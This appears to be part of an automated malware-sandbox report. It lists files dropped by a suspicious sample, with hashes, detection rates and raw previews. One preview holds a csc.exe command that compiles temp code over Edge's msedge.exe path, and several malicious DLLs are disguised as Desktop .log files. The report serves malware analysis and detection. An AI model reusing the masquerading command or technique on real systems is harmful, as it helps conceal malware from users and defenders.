                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723flWbA:Hu7L//TRRzscQna9N
                                    MD5:B341705B1E4A6FD6A128946A65DC6CD1
                                    SHA1:50F886ACF2D11363AEEA2226F5407A7CAB387B57
                                    SHA-256:C40206E923AFAAB88A747C3FCDB65C988CCA16ACBE303490A0FC3CCD46D55A43
                                    SHA-512:33D01DB244B9B64AB68A010467522A7AB9EB2E47FD72624EC9DA616D4C3EE2835E0F031DB8B55ECCA33CE47C3615A14DCDCA552E2D4433394329E528FD286F7A
                                    Malicious:true
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.0.cs"

                                    C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.out

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):762
                                    Entropy (8bit):5.256409089894968
                                    Encrypted:false
                                    SSDEEP:12:l1M6MI/u7L//TRRzscQna9IKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Q6MI/un/VRzstna9IKax5DqBVKVrdFAw
                                    MD5:384E44B631B144AEFD3B3453B8177B4F
                                    SHA1:DB8F59AE38498E4D86BB28014F5DFCC40DAC7204
                                    SHA-256:54B4ED5BAEACB293DFED3FFD8B586FD9EDDABC09BC5B4B15930FAC7B2B17FB7D
                                    SHA-512:A72178A455AAE4AC59CCBDFA2FBFC7B398B63F6C770A3D0E44CCD0393D7571424265834209D2905D5DA3BDF75B831F7F777C9209D6F467F310F8FF66CBB29763
                                    Malicious:false
                                    Preview:.C:\Bridgemonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\AppData\Local\Temp\B16h1t2vIZ

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5712781801655107
                                    Encrypted:false
                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:05A60B4620923FD5D53B9204391452AF
                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\EluSdKNM7k

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.136471148832945
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                    MD5:37B1FC046E4B29468721F797A2BB968D
                                    SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                    SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                    SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\IQd7KmMb44

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.133660689688185
                                    Encrypted:false
                                    SSDEEP:3:c9xuXMHPt:Sxht
                                    MD5:36084160F9D8ACADB93B6613AED2CEAF
                                    SHA1:F30FBDD8FF001B0772B7E8EEF70B354D7D768FA7
                                    SHA-256:4F7BA3F33A9D5A1529BA40F45B35A2374B0407A0ABF420FAEABCB18F1C5DE3CC
                                    SHA-512:876D73800FFCAFB4B47A5FD5A991E6D3D4B410BE53FA4436548D6B1C8C81F9595DA9C4D4679123217E3A03C1999BE7AB1D67AA7180E7ACF8144CE2CAB0D2A789
                                    Malicious:false
                                    Preview:ziexu6Tru1K2i6zy7W9KIoK8D

                                    C:\Users\user\AppData\Local\Temp\NsomwoIAmY

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\QrgHWo0buw

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\RESDC85.tmp

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Sun Aug 25 14:55:48 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1924
                                    Entropy (8bit):4.600022791729385
                                    Encrypted:false
                                    SSDEEP:24:Hzm9BaLzuO9gaHXwKcWYN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:YaLzT9lAKcWYilmuulB+hnqXSfbNtmhn
                                    MD5:34D3F92A5A477C9BC79DF0448B7B9132
                                    SHA1:9013BFC3DB32C944AA0764B336263C35F31420D4
                                    SHA-256:FB0E1A89781C7E375D5201154DFC279EC31AE6E2F263DD425A054EF2FE031C45
                                    SHA-512:7E814E6BF964A38600C1B9605ADCF12B8755B12A403350DAE564EDF3B13350FF85C21DD375C71DDD7A02DF62DE15CDF66D3B5986B4694599DF3F536F1716F865
                                    Malicious:false
                                    Preview:L....E.f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP.....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RESDC85.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\Bridgemonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

                                    C:\Users\user\AppData\Local\Temp\RESDE79.tmp

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Sun Aug 25 14:55:49 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1948
                                    Entropy (8bit):4.549619546920623
                                    Encrypted:false
                                    SSDEEP:24:H8G9E1XOWaHmwKcWYN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:NzlKcWYKluOulajfqXSfbNtmhY2Z
                                    MD5:94E7DD73E2430E0A9B650989CCB0D352
                                    SHA1:DAB0C0425E3650851DB53D119742E2B50DBDC22A
                                    SHA-256:83C7A7A77F4F18887B8F002E7B65F4724174AD01EA734479E0E1E73CC7796447
                                    SHA-512:FB72F2ABCD5E04FC7E8390BC08FFCAEF5D3137B7B619C59F3FE910C05B94A5330512947D982AA78281D16D2478F6AC51CE354932956D559DABEBEC9F0F62921E
                                    Malicious:false
                                    Preview:L....E.f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RESDE79.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\Bridgemonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

                                    C:\Users\user\AppData\Local\Temp\Uyk2XZuMQl

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):0.08235737944063153
                                    Encrypted:false
                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\VCcW5ACHz0

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.6732424250451717
                                    Encrypted:false
                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\VUumaksQ1L

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1239949490932863
                                    Encrypted:false
                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                    MD5:271D5F995996735B01672CF227C81C17
                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\dNXxAgck8g

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\fHEg1gEt1n

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.136471148832945
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                    MD5:37B1FC046E4B29468721F797A2BB968D
                                    SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                    SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                    SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\k7wqnbxppA

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\mEhQIJUl58

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):0.8745947603342119
                                    Encrypted:false
                                    SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                    MD5:378391FDB591852E472D99DC4BF837DA
                                    SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                    SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                    SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\xrQzNkjVDm

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.8508558324143882
                                    Encrypted:false
                                    SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                    MD5:933D6D14518371B212F36C3835794D75
                                    SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                    SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                    SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\y56dheXPNK

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.483856189774723
                                    Encrypted:false
                                    SSDEEP:3:FZd6UM:FZgUM
                                    MD5:78C526AB0EDA28FA6E7F86F3686480CD
                                    SHA1:5F642C505F91359977C83DAEA43752D784BE18EF
                                    SHA-256:39AAC7C3BB81A988E38A142AEF8A8076720FF67F46173E8D0C5711C5A5D69F30
                                    SHA-512:6A70A563F22D947DDF82919813D44C634A25C4FE033E1F5DB80E26EA88F3EF605368248362C757EC8F88B4AD16B810D65C518FE5A5DF2CAB04A1294EBCD2B447
                                    Malicious:false
                                    Preview:HwuJaUp6PSrnbD5MlbPdg2F0G

                                    C:\Users\user\AppData\Local\Temp\yy1pXB1Bma

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1239949490932863
                                    Encrypted:false
                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                    MD5:271D5F995996735B01672CF227C81C17
                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\Desktop\AqqubUji.log

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\EiwsPBui.log

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\LfISQjWH.log

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\MMFizuKP.log

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
